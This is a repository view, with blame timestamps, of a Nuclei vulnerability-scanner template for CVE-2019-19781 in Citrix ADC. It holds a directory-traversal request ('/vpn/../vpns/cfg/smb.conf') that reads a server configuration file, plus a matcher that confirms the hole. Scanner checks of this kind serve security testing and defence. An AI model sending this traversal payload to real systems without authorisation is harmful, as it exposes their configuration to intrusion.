nuclei-templates/cves/2019/CVE-2019-19781.yaml

17 lines
296 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-19781
2020-04-05 22:27:04 +00:00
info:
name: Citrix ADC Directory Traversal
author: organiccrap
severity: high
tags: cve,cve2019,citrix,traversal
2020-04-05 22:27:04 +00:00
requests:
- method: GET
2020-05-25 07:49:06 +00:00
path:
2020-04-05 22:27:04 +00:00
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
matchers:
- type: word
2020-05-25 07:49:06 +00:00
words:
- "[global]"